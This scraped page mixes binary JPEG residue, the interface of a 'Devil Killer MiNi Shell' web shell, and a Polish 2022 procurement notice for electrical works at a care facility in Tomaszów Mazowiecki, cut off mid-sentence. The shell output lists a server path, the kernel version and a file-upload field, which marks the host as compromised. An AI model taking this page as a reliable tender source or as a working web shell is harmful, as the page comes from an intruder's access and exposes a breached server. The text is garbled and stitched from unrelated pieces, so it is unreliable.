JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220224/0006773002-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana instalacji elektrycznych w budynku Zakładu Pielęgnacyjno-Opiekuńczego w Tomaszowie Maz. Przy ul. Niskiej 14&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">TOMASZOWSKIE CENTRUM ZDROWIA SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 100558733</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Pawła II 35</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tomaszów Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">adac13@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpitalwtomaszowie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Zamawiający publiczny Sp. z o.o. </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana instalacji elektrycznych w budynku Zakładu Pielęgnacyjno-Opiekuńczego w Tomaszowie Maz. Przy ul. Niskiej 14&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-adccffbb-9578-11ec-94c8-de8df8ed9da1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00067730</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.szpitalwtomaszowie.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP). Zasady składania ofert oraz<br/>dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania<br/>opisane zostały w Instrukcji użytkownika. Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i<br/>postępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w<br/>szczególności składając ofertę akceptuje zasady korzystania z systemu miniPortal wskazane w<br/>Instrukcji użytkownika i SWZ. W celu korzystania z systemu miniPortal konieczne jest dysponowanie<br/>przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa tylko<br/>na platformie Windows i wymaga .NET Framework 4.5. W przypadku korzystania z urządzeń<br/>mobilnych oraz Mac lub Linux, dostęp do wszystkich funkcjonalności systemu miniPortal może być<br/>ograniczony. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania<br/>czasu odbioru danych:<br/> specyfikacja połączenia formularze udostępnione są za pomocą protokołu<br/>TLS 1.2,<br/> format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem<br/>UTF-8, oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i<br/>dane<br/>zapisywane są z dokładnością co do setnej części sekundy,<br/> integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP.<br/>W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego<br/>automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru, czyli Urzędowe Poświadczenie<br/>Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP<br/>w sekcji „Dane poświadczenia” jest zawarta informacja o dacie doręczenia.<br/>System dostępny jest za pośrednictwem następujących przeglądarek internetowych:Microsoft Internet Explorer od wersji 9.0,<br/> Mozilla Firefox od wersji 15,<br/> Google Chrome od wersji 20.<br/>11.5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku”<br/>i „Formularza do komunikacji” wynosi 150 MB. Dodatkowe informacje zamieszczone w Rozdziale 11SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/22/Sp./2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.3. Szczegółowy Opis Przedmiotu Zamówienia znajduje się w dokumentacji projektowej<br/>zawartej w załączniku Nr 1 do SWZ.<br/>Opis Przedmiotu Zamówienia obejmuje następującą dokumentację:<br/>- projekt,<br/>- STWiORB,<br/>- przedmiar<br/>- wymagania stawiane sieci strukturalnej<br/>- wymagania dotyczące wykonania i modernizacji sieci elektrycznej pod względem<br/>bezpieczeństwa pracy i ochrony przeciwpożarowej<br/>- pozostałe wymagania związane z wykonywanymi pracami.<br/>Zakres prac obejmuje w szczególności:<br/>W ramach zakresu prac należy wykonać:<br/>- Rozdzielnicę główną.<br/>- Wewnętrzne linie zasilające.<br/>- Tablice rozdzielcze piętrowe.<br/>Instalacje oświetleniowe.<br/>- Instalacje gniazd wtyczkowych.<br/>- Instalację przyzywową.<br/>- .Instalacje okablowania strukturalnego<br/>- Instalację połączeń wyrównawczych<br/>- Instalacje ochrony przeciwporażeniowej.<br/>- Wymianę przyłącza elektrycznego i telekomunikacyjnego.<br/>Z uwagi na to, że wynagrodzenie Wykonawcy wskazane w ofercie ma charakter ryczałtowy.<br/>Wystąpienie w trakcie realizacji umowy robót nieujętych w przedmiarze lub robót w większej<br/>ilości w stosunku do przyjętej w przedmiarze nie będzie uprawniało Wykonawcy do żądania<br/>dodatkowego wynagrodzenia - jeżeli roboty te ujęte były w dokumentacji projektowej – OPZ<br/>Załączniku nr 1 do SWZ.<br/>Roboty budowlane muszą być wykonane zgodnie z dokumentacją zawartą w Załączniku nr 1 do<br/>SWZ – Opisie Przedmiotu Zamówienia, obowiązującymi przepisami, w tym Rozporządzeniem<br/>Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim<br/>powinny odpowiadać budynki i ich usytuowanie zgodnie ze stanem obowiązującym od 1 stycznia<br/>2021r., normami oraz zasadami wiedzy technicznej i sztuki budowlanej.<br/>4.4. Szczególne wymagania i wytyczne dla Wykonawcy.<br/>1) Wykonawca zobowiązany jest do zachowania najwyższego standardu:<br/>a) utrzymania w czystości i w porządku terenu swoich robót oraz otoczenia na bieżąco;<br/>b) utrzymania terenu robót i terenu przyległego do terenu robót w stanie wolnym od przeszkód<br/>komunikacyjnych,<br/>c) zabezpieczenia terenu robót przed wstępem osób nieuprawnionych,<br/>d) zapewnienia bezpieczeństwa w trakcie wykonywania robót, m.in. wynikających z<br/>obowiązujących przepisów prawa, dotyczących ochrony przeciwpożarowej, bezpieczeństwa i<br/>higieny pracy – dotyczy zarówno pracowników Wykonawcy jak i osób trzecich, tj. pacjentów oraz<br/>personelu Zamawiającego;<br/>Pozostałe obowiązki Wykonawcy zostaną ujęte w projekcie umowy.<br/>4.5. Rozwiązania równoważne.<br/>W każdym przypadku użycia w opisie przedmiotu zamówienia norm, ocen technicznych,<br/>specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1<br/>pkt 2 oraz ust. 3 ustawy Pzp Wykonawca powinien przyjąć, że odniesieniu takiemu towarzyszą<br/>wyrazy „lub równoważne”.<br/>W przypadku użycia w dokumentacji projektowej odniesień do norm, europejskich ocen<br/>technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych<br/>Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca analizując<br/>dokumentację projektową powinien założyć, że każdemu odniesieniu użytemu w dokumentacji<br/>projektowej towarzyszy wyraz „lub równoważne&#34;.<br/>W przypadku, gdy w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru<br/>robót zostały użyte znaki towarowe, oznacza to, że są podane przykładowo i określają jedynie<br/>minimalne oczekiwane parametry jakościowe oraz wymagany standard. Wykonawca może<br/>zastosować materiały lub urządzenia równoważne, lecz o parametrach technicznych i<br/>jakościowych podobnych lub lepszych, których zastosowanie w żaden sposób nie wpłynie<br/>negatywnie na prawidłowe funkcjonowanie rozwiązań przyjętych w dokumentacji projektowej.<br/>Wykonawca, który zastosuje urządzenia lub materiały równoważne będzie obowiązany wykazać<br/>w trakcie realizacji zamówienia, że zastosowane przez niego urządzenia i materiały spełniają<br/>wymagania określone przez Zamawiającego.<br/>Użycie w dokumentacji projektowej etykiety oznacza, że Zamawiający akceptuje wszystkie<br/>etykiety potwierdzające, że dane roboty budowlane, dostawy lub usługi spełniają równoważne wymagania określonej przez zamawiającego etykiety. W przypadku gdy Wykonawca z przyczyn<br/>od niego niezależnych nie może uzyskać określonej przez Zamawiającego etykiety lub<br/>równoważnej etykiety, Zamawiający, w terminie, przez siebie wyznaczonym akceptuje inne<br/>odpowiednie przedmiotowe środki dowodowe, w szczególności dokumentację techniczną<br/>producenta, o ile dany Wykonawca udowodni, że roboty budowlane, dostawy lub usługi, które<br/>mają zostać przez niego wykonane, spełniają wymagania określonej etykiety lub określone<br/>wymagania wskazane przez Zamawiającego.<br/>Użycie w dokumentacji projektowej wymogu posiadania certyfikatu wydanego przez jednostkę<br/>oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę jednostkę jako<br/>środka dowodowego potwierdzającego zgodność z wymaganiami lub cechami określonymi w<br/>opisie przedmiotu zamówienia, kryteriach oceny ofert lub warunkach realizacji zamówienia<br/>oznacza, że Zamawiający akceptuje również certyfikaty wydane przez inne równoważne<br/>jednostki oceniające zgodność. Zamawiający akceptuje także inne odpowiednie środki<br/>dowodowe, w szczególności dokumentację techniczną producenta, w przypadku, gdy dany<br/>Wykonawca nie ma ani dostępu do certyfikatów lub sprawozdań z badań, ani możliwości ich<br/>uzyskania w odpowiednim terminie, o ile ten brak dostępu nie może być przypisany danemu<br/>Wykonawcy, oraz pod warunkiem że dany Wykonawca udowodni, że wykonywane przez niego<br/>roboty budowlane, dostawy lub usługi spełniają wymogi lub kryteria określone w opisie<br/>przedmiotu zamówienia, kryteriach oceny ofert lub wymagania związane z realizacją<br/>zamówienia.<br/>Jeżeli w opisie przedmiotu zamówienia ujęto zapis wynikający z KNR lub KNNR wskazujący na<br/>konieczność wykorzystywania przy realizacji zamówienia konkretnego sprzętu o konkretnych<br/>parametrach Zamawiający dopuszcza używanie innego sprzętu o ile zapewni to osiągnięcie<br/>zakładanych parametrów projektowych i nie spowoduje ryzyka niezgodności wykonanych prac z<br/>dokumentacją techniczną.<br/>4.6. Gwarancja.<br/>Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały<br/>i urządzenia - stanowi kryterium oceny ofert. Zamawiający określa go na okres<br/>minimalny 36 miesięcy (termin minimalny) Zamawiającemu przysługują pełne uprawnienia z<br/>tytułu rękojmi za wady fizyczne wynikające z przepisów kodeksu cywilnego w terminach tam<br/>określonych – niezależnie od uprawnień z tytułu gwarancji (uwaga: nie dotyczy urządzeń i<br/>materiałów co do których Zamawiający wymaga odrębnej dłuższej gwarancji np. na wykonane<br/>okablowanie strukturalne zostanie objęte minimum 25-cio letnim certyfikatem gwarancyjnym<br/>wydanym przez producenta okablowania, przewody elektryczne, komponenty i inne składowe<br/>instalacji oświetlenia – minimum 60 miesięcy)<br/>Okres gwarancji stanowi kryterium oceny ofert.<br/>4.7. Ubezpieczenie.<br/>Zamawiający wymaga od Wykonawcy ubezpieczenia robót budowalnych zgodnie z warunkami<br/>określonymi przez Zamawiającego w Projekcie umowy.<br/>4.8. Przedmiotowe środki dowodowe.<br/>Zamawiający nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych.<br/>4.9. Wizja lokalna.<br/>Zamawiający dopuszcza ale nie wymaga– przed złożeniem oferty - odbycie wizji lokalnej<br/>przyszłego terenu robót w siedzibie Zamawiającego, oraz sprawdzenia przez wykonawcę<br/>dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u zamawiającego, co<br/>pozwoli Wykonawcom na sprawdzenie miejsca robót oraz warunków związanych z wykonaniem<br/>prac będących przedmiotem zamówienia. Wizję lokalną należy przeprowadzić przy udziale<br/>przedstawiciela Zamawiającego - po uprzednim zgłoszeniu chęci odbycia wizji na adres email:<br/>techniczny@ tomaszow.org.pl lub zaopatrzenie@tomaszow.org.pl, tel.: (44) 7257 - 213) i<br/>otrzymaniu zwrotnie potwierdzenia możliwości odbycia wizji ze strony Zamawiającego. Wizji<br/>można dokonywać w dniach roboczych (od poniedziałku do piątku) w godzinach od 7:30 do<br/>14:30). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45310000-3 - Roboty instalacyjne elektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1	Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/><br/>Lp.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60<br/>2	Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia (G)	<br/>35<br/>3	<br/>Termin realizacji zamówienia ( R )<br/>	<br/>5<br/><br/><br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.4.) Nazwa i opis warunków udziału w postępowaniu.<br/>zdolności technicznej lub zawodowej w zakresie:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>a) Warunek zostanie spełniony jeżeli wykonawca wykaże, iż dysponuje lub będzie dysponował<br/>osobami zdolnymi do sprawowania samodzielnych funkcji technicznych w budownictwie w<br/>zakresie kierowania robotami w okresie wykonywania zamówienia i skieruje do jego realizacji<br/>minimum jedną osobą (Kierownika robót) posiadającą uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności elektrycznej (uprawnienia do 1kVA), których zakres<br/>uprawnia do kierowania robotami objętymi przedmiotem zamówienia, lub odpowiadające im<br/>równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, a w<br/>przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami<br/>równoważne do wyżej wskazanych,<br/>b) na potwierdzenie zdolności zawodowej Zamawiający wymaga, aby Wykonawcy wykazali, że<br/>w okresie 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wykonali co najmniej 1 robotę budowlaną, której przedmiotem były<br/>roboty budowlane polegające na budowie, przebudowie, modernizacji sieci elektrycznych, o<br/>wartości min. 700.000,00 zł brutto oraz załączy dowody potwierdzające, że ww. roboty zostały<br/>wykonane należycie, w szczególności, że zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone.<br/>W przypadku, gdy wartość zamówienia (umowy) jest określona w innej walucie niż w złotych<br/>polskich, Zamawiający dokona przeliczenia tej wartości na złote polskie – na podstawie<br/>średniego kursu złotego w stosunku do waluty obcej określonej w Tabeli Kursów Narodowego<br/>Banku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.3.1. w celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego<br/>zgodnie z Załącznikiem Nr 7 do SWZ – w odniesieniu do warunku określonego w pkt 6.1.4. lit. a) SWZ.<br/>b) wykazu robót, z którego wynika, iż wykonawcy wykonali, co najmniej 1 robotę budowlaną, której<br/>przedmiotem były roboty budowlane polegające na –budowie, przebudowie, modernizacji sieci<br/>elektrycznych, o wartości min. 700.000,00 zł brutto oraz załączy dowody potwierdzające, że ww. roboty<br/>zostały wykonane należycie, w szczególności, że zostały wykonane zgodnie z przepisami prawabudowlanego i prawidłowo ukończone, sporządzonego zgodnie z Załącznikiem Nr 9 do SWZ, w<br/>odniesieniu do warunku określonego w pkt 6.1.4. lit. b) SWZ.<br/>c) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w 